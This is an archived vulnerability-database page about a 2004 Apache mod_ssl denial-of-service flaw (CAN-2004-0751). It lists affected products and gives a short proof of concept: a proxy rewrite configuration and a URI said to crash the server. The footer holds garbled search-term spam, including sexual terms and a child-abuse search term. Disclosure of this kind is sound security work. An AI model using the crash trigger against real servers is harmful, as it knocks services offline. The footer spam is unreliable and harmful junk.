about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Apache mod_ssl Remote Denial of Service Vulnerability


Title Apache mod_ssl Remote Denial of Service Vulnerability
Published 2004-09-10-12:00AM
Updated 2005-01-13-05:33PM
Class Failure to Handle Exceptional Conditions
CVE   CAN-2004-0751
Remote  Yes
Local  No
Credit  Discovery is credited to M. "Alex" Hankins <lxhankins002@fastmail.fm>.
Vulnerable  Turbolinux Turbolinux Server 10.0
Turbolinux Turbolinux Desktop 10.0
Turbolinux Home
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Trustix Secure Enterprise Linux 2.0
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux AS 3
RedHat Desktop 3.0
MandrakeSoft Linux Mandrake 10.0 amd64
MandrakeSoft Linux Mandrake 10.0
MandrakeSoft Linux Mandrake 9.2 amd64
MandrakeSoft Linux Mandrake 9.2
HP Tru64 UNIX Compaq Secure Web Server 6.3
HP Tru64 UNIX Compaq Secure Web Server 5.9.2
HP Tru64 UNIX Compaq Secure Web Server 5.9.1
HP Tru64 UNIX Compaq Secure Web Server 5.8.2
HP Tru64 UNIX Compaq Secure Web Server 5.8.1
HP Tru64 UNIX Compaq Secure Web Server 5.1 A
HP Tru64 UNIX Compaq Secure Web Server 5.1
HP Tru64 UNIX Compaq Secure Web Server 5.0 A
HP Tru64 UNIX Compaq Secure Web Server 4.0 G
HP Tru64 UNIX Compaq Secure Web Server 4.0 F
HP HPUX B.11.23
HP HPUX B.11.22
HP HPUX B.11.11
HP HPUX B.11.00
Gentoo Linux 1.4
Conectiva Linux 10.0
Conectiva Linux 9.0
Apache Software Foundation Apache 2.0.50
MandrakeSoft Linux Mandrake 10.1
MandrakeSoft Linux Mandrake 10.1 x86_64
Apache Software Foundation Apache 2.0.47
Apple Mac OS X Server 10.1
Apple Mac OS X Server 10.1.1
Apple Mac OS X Server 10.1.2
Apple Mac OS X Server 10.1.3
Apple Mac OS X Server 10.1.4
Apple Mac OS X Server 10.1.5
Apple Mac OS X Server 10.2
Apple Mac OS X Server 10.2.1
Apple Mac OS X Server 10.2.2
Apple Mac OS X Server 10.2.3
Apple Mac OS X Server 10.2.4
Apple Mac OS X Server 10.2.5
Apple Mac OS X Server 10.2.6
Apple Mac OS X Server 10.2.7
Apple Mac OS X Server 10.2.8
Apple Mac OS X Server 10.3
Apple Mac OS X Server 10.3.1
Apple Mac OS X Server 10.3.2
Apple Mac OS X Server 10.3.3
Apple Mac OS X Server 10.3.4
Apple Mac OS X Server 10.3.5
MandrakeSoft Linux Mandrake 9.1
MandrakeSoft Linux Mandrake 9.1 ppc
MandrakeSoft Linux Mandrake 9.2
MandrakeSoft Linux Mandrake 9.2 amd64
Not Vulnerable  HP Tru64 UNIX Compaq Secure Web Server 6.3.2 a
Apache Software Foundation Apache 2.0.51
RedHat Fedora Core1
Code   No exploit is required.

The following proof of concept is available:

With the following configuration in httpd.conf:
Listen 47290
SSLProxyEngine on
RewriteEngine on
RewriteRule /(.*) https://www.example.com/$1 [P]

The server may be crashed by issuing the following URI:
http://www.example.com:47290/eRoomASP/CookieTest.asp?facility=facility&URL=%2FeRoom%2FFacility%2FRoom%2F0_4242
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 05 Dec 2009 23:16:11 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Imapd cpan www.aq.bat www.slazy news for c news for c fanlinet.c behnoosh b www..young Wap fullse modules/ic xxx sex mo www.sexyt phpHtmlLib 200 /compo vet5.cn ama vuln/explo sexfelm sexey vedi Video anak sexey vedi www.trish Pornopiche iilocefesy super vise GET /galle xxl sex tv bangalore www.slin8. www.saniam +pthc www.sunjin ts021.cn www.trish Telecharge www.sbicar www.tukaix bollywood sex1200 Girl sex m Mp3 softwa www.trish Sexi+muve italy ftv. www.sunjin shoutcast ICQ 5.01 www.Southi sexpicturs Imegas